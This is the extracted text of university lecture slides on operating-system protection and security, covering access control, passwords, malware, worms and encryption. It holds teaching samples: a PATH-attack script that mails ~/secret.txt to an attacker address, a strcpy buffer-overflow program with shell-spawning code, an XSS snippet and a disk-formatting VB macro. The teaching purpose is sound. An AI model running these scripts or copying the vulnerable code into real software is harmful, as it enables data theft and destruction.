TDDI04 Concurrent Programming, Operating Systems, and Real-time Operating Systems Protection versus Security § Protection = the mechanisms that can be used to control access to various resources • These mechanisms must be configurable! Protection and Security § Security = a measure of confidence that the integrity of a system and its data will be preserved… [SGG7] Chapters 14 + 15 • Copyright Notice: The lecture notes are mainly based on Silberschatz’s, Galvin’s and Gagne’s book (“Operating System Concepts”, 7th ed., Wiley, 2005). No part of the lecture notes may be reproduced in any form, due to the copyrights reserved by Wiley. These lecture notes should only be used for internal teaching purposes at the Linköping University. Acknowledgment: The lecture notes are originally compiled by C. Kessler, IDA. Klas Arvidsson, IDA, Linköpings universitet. Protection and Security Includes a well-specified threat description and policies for how to configure internal and external protection mechanisms to deal with that threat TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.2 Mechanism: House with door Policy: Keep the door locked © Silberschatz, Galvin and Gagne 2005 Principles of Protection Protection (Chapter 14) Security (Chapter 15) § Goals of Protection n The Security Problem § Domain of Protection n Authentication § Access Matrix n Program Threats § Implementation of Access Matrix n System Threats § Revocation of Access Rights n Encryption (briefly) § Guiding principle – principle of least privilege • Programs, users and systems should be given just enough privileges to perform their tasks § Capability-Based Systems § Language-Based Protection TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.3 © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.4 © Silberschatz, Galvin and Gagne 2005 Domain Structure Domain Implementation (1) § Access-right = <object-name, rights-set> § Standard dual-mode system consists of 2 domains: where rights-set is a subset of all valid operations that can be performed on the object. • • User Supervisor Insufficient for multi-user systems § Domain = set of access-rights § UNIX • • Domain = user-id (one for each user) Domain switch accomplished via file system. > Each file has associated with it a domain bit (setuid bit). > When file is executed and setuid == on, then user-id is set to owner of the file being executed. When execution completes, user-id is reset. TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.5 © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.6 © Silberschatz, Galvin and Gagne 2005 1 Domain Implementation (2) Access Matrix (1) MULTICS (1965-2000): Onion structure: § View protection as a matrix (access matrix) • • • § Let Di and Dj be any two domain rings. § If j < i ⇒ Di ⊆ Dj § = linear inheritance of domains and access rights § Not flexible enough, too coarse granularity Columns represent objects that can be operated upon Access(i, j) = set of operations that a process executing in domain Di an invoke on object Fj Process in inner ring has access to objects in outer ring www.multicians.org TDDI04, K. Arvidsson, IDA, Linköpings universitet. Rows represent domains that a process can belong to 13.7 Multics Rings © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.8 © Silberschatz, Galvin and Gagne 2005 Access Matrix (2) Use of Access Matrix § Access matrix design separates mechanism and policy: § If a process in Domain Di tries to do “op” on object Oj, then “op” must be in Access(i,j). • Mechanism: > OS provides access matrix > OS ensures that the matrix is only manipulated by authorized agents • § Can be expanded to dynamic protection. • • Policy: > User dictates policy, i.e., she fills in the access matrix, specifying who can access what object and in what mode. Operations to add, delete access rights. Special access rights: > owner of Oi > copy op from Oi to Oj > control – Di can modify Dj access rights > transfer – switch from domain Di to Dj TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.9 © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.10 © Silberschatz, Galvin and Gagne 2005 Access Matrix with Copy Rights Access Matrix With Owner Rights A domain may grant us to… Stronger than ”copy-right”: - copy - transfer A process in a domain with ownership of a certain object may modify every other right of other domains on that object. an access right to another domain, with or without the possibility to further copy / transfer the access right. Example: A process in domain D2 has owner rights on F2 and may thus … Example: -Add write* access for itself A process in a domain D2 may copy his read-access on F2 to other domains. -Add write access for D3 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.11 © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.12 © Silberschatz, Galvin and Gagne 2005 2 Access Matrix with Domains as Objects Objectification (Reification): representing functions, rules, etc. as objects The matrix can be expanded with dynamic protection: + Add the domains as new objects with corresponding operations + switch to do domain switching (e.g., from D2 to D3) + control to allow members of one domain to edit another domain Implementation of Access Matrix § Each column = Access-control list for one object. Defines who can perform what operation. Domain 1 = Read, Write Domain 2 = Read Domain 3 = Read Μ § Each row = Capability List (like a key) For each domain, what operations are allowed on what objects to a process in the domain. A process in D2 may switch to D3 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.13 A process in D2 may remove any right listed for D4 © Silberschatz, Galvin and Gagne 2005 Object 1 – Read Object 4 – Read, Write, Execute Object 5 – Read, Write, Delete, Copy TDDI04, K. Arvidsson, IDA, Linköpings universitet. Unix: Each file has r-w-x bits for the three domains: + owner + group + other users Nowadays it also has additional access lists for arbitrary users. Win2K, XP: similar UNIX file descriptor / Win file handle with its pointer to system-wide open file table entry is a capability. 13.14 © Silberschatz, Galvin and Gagne 2005 Access Control Pros and Cons § Protection can be applied to non-file resources Capability lists: § Simpler run-time behavior – process has all information § Harder to revoke access rights • There may be many processes out there with capabilities that we must search for… § Solaris 10 provides role-based access control to implement least privilege • Privilege is the right to execute a system call or use an option within a system call, e.g. open( file, “w”) • • Can be assigned to processes • Replaces pot. unsecure constructs such as setuid bit, superuser mode Access control lists: § Corresponds to the needs of individual users/processes § Simple to revoke access rights for individual objects § System-wide overview is difficult – information is spread out • What access rights does process P have? Users are assigned roles granting access to privileges and programs TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.15 § Overhead – ACL must be searched for every access to object © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.16 © Silberschatz, Galvin and Gagne 2005 A combination is often used… Revocation of Access Rights Example: Unix file access § Access List – Delete access rights from access list. • Simple § Access lists determine if a file may be opened • Immediate § The open method returns a file handle held by the process § Capability List – Scheme required to locate capability in the system before capability can be revoked. § The file handle is a capability – a proof that the process may operate on that file, … • but only in a way as specified when obtaining the handle – which must still be checked at every access! TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.17 © Silberschatz, Galvin and Gagne 2005 • Reacquisition – in regular intervals remove selected capabilities from all domains and require reacquisition • Back-pointers – keep pointers from the object to all processes that have capabilities on it (easy but expensive) • Indirection – capabilities point to a table that points to the object. Revoke by breaking the indirection. (only for global revocation) • Keys TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.18 © Silberschatz, Galvin and Gagne 2005 3 The Security Problem Security Terminology A system is secure if its resources are used and accessed as intended under all circumstances. § Threat is potential security violation § Attack is attempt to breach security § Security must consider external environment of the system, and protect the system resources from security violations and misuse: • • • § Authentication tries to verify a user is who she claims to be unauthorized access malicious modification or destruction § Intruders (crackers) attempt to breach security, often by masquerading as someone else accidental introduction of inconsistency TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.19 § Protection is the means taken to alleviate known and unknown threats © Silberschatz, Galvin and Gagne 2005 Four security levels of concern TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.20 © Silberschatz, Galvin and Gagne 2005 Categories of violations § Breach of confidentiality § Physical – the room/building/site must lock out intruders § Humans – are they all trustworthy? Security is as weak as the weakest link in the chain. § Network – what happens on the wire? Break-in? Denial-of-service? § Operating System – protect itself from mishaps and mis-usage 13.21 Unauthorized access to secret/sensitive data (Blueprints, medical jounals, credit card information) § Breach of integrity • Unauthorized modification of data (Source code, business arrangements) § Breach of availability • Unauthorized destruction of data § Theft of service • Easier to protect against accidental usage than against malicious misuse. TDDI04, K. Arvidsson, IDA, Linköpings universitet. • © Silberschatz, Galvin and Gagne 2005 Unauthorized use of resources (Install intrusion software to allow use of a system for further attacks hard to trace) § Denial of service • Preventing legitimate use/access to resources (DOS attacks, block logins by exceeding bad login attempts) TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.22 Security Violation Methods User Authentication § Masquerading (breach authentication) § Crucial to identify user correctly, as protection systems depend on user ID © Silberschatz, Galvin and Gagne 2005 § Man-in-the-middle attack § Replay attack (repeat a valid transmission, possibly with modifications) § User identity must be established • (can be considered a special case of either keys or capabilities) § Session hijacking • • • Authentication can be compromised by phishing social engineering, or dumpster diving TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.23 Through passwords © Silberschatz, Galvin and Gagne 2005 By user possession of a key or card Biometry (fingerprint, signature, eye retina pattern) Combination of above or other means TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.24 © Silberschatz, Galvin and Gagne 2005 4 Use of passwords UNIX password handling A password must be handled with care: “keep it secret, keep it safe” § Passwords are kept in files (/etc/passwd) There are several means to improve password secrecy: § Each password is encrypted with a one-way crypto + a ”salt” § Use good non-guessable passwords § Use easy to remember passwords (no need to write down) § Change passwords frequently § To verify a password: § Use one-time passwords • • • § System log all invalid login attempts § System store passwords inaccessible to normal users § System store passwords encrypted To create a good password, invent an easy to remember sentence and pick the first (last/middle) letter of each word: “I will score 100% on the Pintos exam!” => Iws1%otPe! (Iie0%nesm!) TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.25 © Silberschatz, Galvin and Gagne 2005 More on password handling Similar problems still exist! § In web servers, user-id and passwords are often stored in ordinary files. § E.g., in Apache, the .htaccess file may specify authentication using a .htpasswd file analogous to the old Unix passwd file... NEVER reuse a real password when you visit or register in a website! 13.27 © Silberschatz, Galvin and Gagne 2005 Program Threats Compare result with what is stored § Attack: Steal the password file, generate passwords brute force, or use a dictionary... • For a long time only 8 chars of the password were used! TDDI04, K. Arvidsson, IDA, Linköpings universitet. © Silberschatz, Galvin and Gagne 2005 13.26 Malicious programs Program Threats System Threats (need host program) (independent) Trapdoor Logic Trojan Buffer overflow attack (back door) bomb Horse PATH attack Fake-login attack TDDI04, K. Arvidsson, IDA, Linköpings universitet. Virus Worm replicating Spyware e.g. keylogger 13.28 Zombie (hidden, remotely controlled submachine used e.g. for spam distribution, denial-ofservice attacks) © Silberschatz, Galvin and Gagne 2005 Trojan Horse § Trap Door / Back Door • Specific user identifier or password that circumvents normal security procedures • Could be included in a compiler! § Innocent-looking code segment that misuses its environment. § Exploits mechanisms for allowing programs written by users to be executed by other users. § Logic Bomb • Encrypt the submitted password Classification of Malware Unix password files are no longer readable for normal users. § Special programs with access rights to be used for accessing password entries § Such programs may monitor your access and delay repeated requests TDDI04, K. Arvidsson, IDA, Linköpings universitet. Lookup the salt for the user Program that initiates a security incident under certain circumstances § Trojan Horse • • Code segment that misuses its environment • PATH attack, Spyware, pop-up browser windows, covert channels ... Exploits mechanisms for allowing programs written by users to be executed by other users NEVER download a “funny game” from some site, unless you know and trust the person who wrote it (≠ the person making it available) see also Spyware issue of Communications of the ACM, August 2005 § Stack and Buffer Overflow • Exploits a bug in a program, e.g. stack / memory buffer overflow TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.29 © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.30 © Silberschatz, Galvin and Gagne 2005 5 PATH attack Trojan Horse / Back Door attacks echo $PATH § Consider the UNIX search path: • e.g., PATH = .:/usr/local/bin:/sw/tex/bin:/home/me/bin • used to search for any program, e.g. ls, without needing to specify the full path name § Attacker write a small script for the exploit #!/bin/sh rm /attacked/directory/ls cat ~/secret.txt | mail trudy@crack.nu /usr/bin/ls § The script is placed in any directory (here called ‘/attacked/directory’) the attacker has write access to under a suitable name (here ‘ls’) § Eventually someone (the victim) will enter that directory and very likely issue the system command ‘ls’. Since ‘.’ appear first in PATH the attack script is run. With the access rights of the victim (possibly ‘root’)! § Policy: All directories in search path must be secure, incl. ”.” § Variant: LIB search path LD_LIBRARY_PATH (Linux) • Attacker manipulates libc.a TDDI04, K. Arvidsson, IDA, Linköpings universitet. © Silberschatz, Galvin and Gagne 2005 13.31 § Do you read HTML-formatted entries on a public bulletin board? Don’t! (…unless you know it has been filtered!) • it may contain Javascript ... <a onHover=“runCode();false;”>…</a> • …that will get executed when you happen to slide the mouse over that area (HTML cross-site scripting) § Playing internet games? Ever been asked to “download and install” something to continue playing…? DON’T! Such programs may: • Open up a back door for other attacks • Join your computer in a stealthy net of proxies… …to be used later TDDI04, K. Arvidsson, IDA, Linköpings universitet. © Silberschatz, Galvin and Gagne 2005 13.32 Back door / Trap Door C Program with Buffer-Overflow Vulnerability The programmer left an intentional hole in your trusted software: #include <stdio.h> #define BUFFER_SIZE 256 int main ( int argc, char *argv[] ) { § Specific user identifier or password that circumvents normal security procedures. § Could be included in a compiler (the compiler adds extra exploit code to all programs compiled, or add the code only when certain tags are found, e.g. in the source code of the ‘login’ program) char buffer[BUFFER_SIZE]; if (argc < 2) return -1; else { strcpy(buffer,argv[1]); return 0; § Could even be an easily exploitable buffer overflow that will likely pass undetected even if the source code are released and checked by the users § Do you know what your RealPlayer is up to?? TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.33 } } © Silberschatz, Galvin and Gagne 2005 Buffer Overflow Attack – Modified Shell Code Very simplified, but similar fixedsize, stack-allocated buffers were actually used in common remote service daemons (e.g., for ftp, telnet, finger…) … TDDI04, K. Arvidsson, IDA, Linköpings universitet. #include <stdio.h> { execvp(“\bin\sh”, “\bin\sh”, NULL); return 0; 13.34 buffer © Silberschatz, Galvin and Gagne 2005 Buffer Overflow Attack – Effect on Stack Frame Before copying int main(int argc, char *argv[]) Usual run-time stack with procedure activation record, for main() call: After copying of modified shell code (stored in parameter) into buffer An exploit of the buffer overflow vulnerability above } The execvp(…) call creates a shell process that runs with same privileges as the attacked program! Compile this and obtain executable: a12f341dc76752ffe096c2…d092e4 Problem: The address on stack must be guessed. Write this as an ASCII string with same bit pattern: ”$s¤E7\223 T+%yr1!...”, append the right number of NOPs, guess the right start address, append it too, and pass this string as parameter to the service of the previous slide… Jump to register technique Solution: Use a noop sled to increase the target size, or if possible the jump to register technique. Noop sled (image from Wikipedia) (image from Wikipedia) TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.35 © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.36 © Silberschatz, Galvin and Gagne 2005 6 Viruses Buffer Overflow Protection Hardware protection § Strict separation of program and data memory sections • Recent SUN SPARC processors and Solaris versions: > no execution of code located in a stack section (segmentation violation) • Recent AMD / Intel x86, for Linux and Windows XP SP2: > NX bit in page table marks page as non-executable § Code fragment embedded in legitimate program § Very specific to CPU architecture, operating system, applications – mainly affect microcomputer systems § Downloading viral programs from public bulletin boards or exchanging floppy disks etc. containing an infection. § Usually borne via email (attachment) or as a macro • Language and System software protection § use a tool for automatic bound checking, e.g. Electric Fence § use a language with built-in bound checks, e.g. Java Visual Basic Macro to reformat hard drive Sub AutoOpen() Dim oFS Set oFS = CreateObject(“Scripting.FileSystemObject”) vs = Shell(“c:command.com /k format c:”,vbHide) Application-level protection (Programmer’s responsibility) § use strncpy(buffer, argv[1], sizeof(buffer)-1); instead TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.37 © Silberschatz, Galvin and Gagne 2005 Viruses (2) End Sub TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.38 © Silberschatz, Galvin and Gagne 2005 A Boot-sector Computer Virus § Virus dropper inserts virus into the system usually a Trojan Horse § Many categories of viruses • • • • • • • File Boot Macro Source code Polymorphic Encrypted Stealth, Tunneling, Multipartite, Armored and more… TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.39 © Silberschatz, Galvin and Gagne 2005 System and Network Threats § Attacks more effective and harder to counter if multiple networked systems are involved § Worms § Port scanning • Automated attempt to connect to a range of ports on one or a range of IP addresses To detect a system’s vulnerabilities § Denial of Service • Overload the targeted computer preventing it from doing any useful work • Distributed denial-of-service (DDOS) come from multiple sites at once TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.41 13.40 © Silberschatz, Galvin and Gagne 2005 System Threats: Worms § Target: abuse of services and network connections • TDDI04, K. Arvidsson, IDA, Linköpings universitet. © Silberschatz, Galvin and Gagne 2005 § Worm = process that uses the spawn mechanism to ravage system performance • • standalone program • • • Reproduces itself via network links, e.g. Email Spawns copies of itself, using up system resources and perhaps locking out all other processes Often (erroneously) called ”virus” Became a threat with increased networking § First worm for Unix 1988, since then mainly for Windows-based systems: Melissa, ILOVEYOU, Sobig, … § Most “worms” need a non-critical user • e.g. spam mails – “New bug found by MS – install this patch now!” … Microsoft NEVER submits updates via e-mail! TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.42 © Silberschatz, Galvin and Gagne 2005 7 The Morris Internet Worm (1988) System Threats “But why should they target my computer? I don’t have anything valuable or secret there...” § You have access to Internet? ...your computer is useful for.... § Exploiting buffer-overflow vulnerability in finger daemon with a 536 byte parameter… • • Storing data (possibly illegal data) • Participating in a collective simultaneous attack on some large server somewhere... ...which then gets overloaded, shuts down = ”denial of service attack” § Exploiting rsh feature of easy remote login without password control § Exploiting nondisabled debug option (for showing status) vulnerability in sendmail TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.43 © Silberschatz, Galvin and Gagne 2005 Impersonating you when doing other (good or bad?) things on the net... TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.44 Threat Monitoring Threat Monitoring (Cont.) § Check for suspicious patterns of activity – i.e., several incorrect password attempts may signal password guessing. § Check for: • • Check for known attack patterns Check for deviations from normal patterns (possibly detecting unknown attacks) § Audit log – records the time, user, and type of all accesses to an object; useful for recovery from a violation and developing better security measures. § Threat monitoring - Scan the system periodically for security holes; done when the computer is relatively unused. TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.45 © Silberschatz, Galvin and Gagne 2005 Network Security Through Domain Separation Via Firewall © Silberschatz, Galvin and Gagne 2005 • • • • • • • Short or easy-to-guess passwords • Changes to system programs: monitor checksum values Unauthorized setuid programs Unauthorized programs in system directories Unexpected long-running processes Improper directory protections Improper protections on system data files Dangerous entries in the program search path (Trojan horse) TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.46 © Silberschatz, Galvin and Gagne 2005 Encryption § Encrypt clear text into cipher text. § Properties of good encryption technique: • Relatively simple and efficient for authorized users to encrypt and decrypt data. • Encryption scheme depends not on the secrecy of the algorithm but on a parameter of the algorithm called the encryption key. • There is a built-in firewall in WindowsXP and several free ones on the web! TDDI04, K. Arvidsson, IDA, Linköpings universitet. DMZ = DeMilitarized Zone 13.47 © Silberschatz, Galvin and Gagne 2005 Extremely difficult for an intruder to determine the encryption key. § Ex.: Data Encryption Standard (DES) substitutes characters and rearranges their order on the basis of an encryption key provided to authorized users via a secure mechanism. Scheme only as secure as the mechanism. TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.48 © Silberschatz, Galvin and Gagne 2005 8 Symmetric Encryption Asymmetric encryption § Same key to encrypt and decrypt § Different encryption and decryption key § Key must be kept secret § Only one key need to be kept secret, the other can be public § Need one key for every pair of users § Simplifies key exchange (Distribute the public key and keep the private safe) § Can be made reasonable efficient § Much more computationally expensive § Generally used only for small amounts of data, short messages, authentication and certificates Examples: § Can exploit the easy key exchange to encrypt a symmetric key used for further communication § DES (today considered insecure) § AES, twofish, RC4, RC5 Example: § RSA (Rivest, Shamir and Adleman) TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.49 © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.50 RSA Encryption Cryptography as a Security Tool § Public-key encryption based on each user having two keys: § Broadest security tool available • • © Silberschatz, Galvin and Gagne 2005 public key – published key used to encrypt data. • private key – key known only to individual user used to decrypt data. Source and destination of messages cannot be trusted without cryptography • Means to constrain potential senders (sources) and / or receivers (destinations) of messages § Must be an encryption scheme that can be made public without making it easy to figure out the decryption scheme. • • • Concept: One-way function, e.g. factorization • Use the prime numbers as keys § Based on secrets (keys) Efficient algorithm for testing factorization of a number. No efficient algorithm is known for finding the prime factors of a large number (if you don’t have one of them). TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.51 © Silberschatz, Galvin and Gagne 2005 TDDI04, K. Arvidsson, IDA, Linköpings universitet. 13.52 © Silberschatz, Galvin and Gagne 2005 9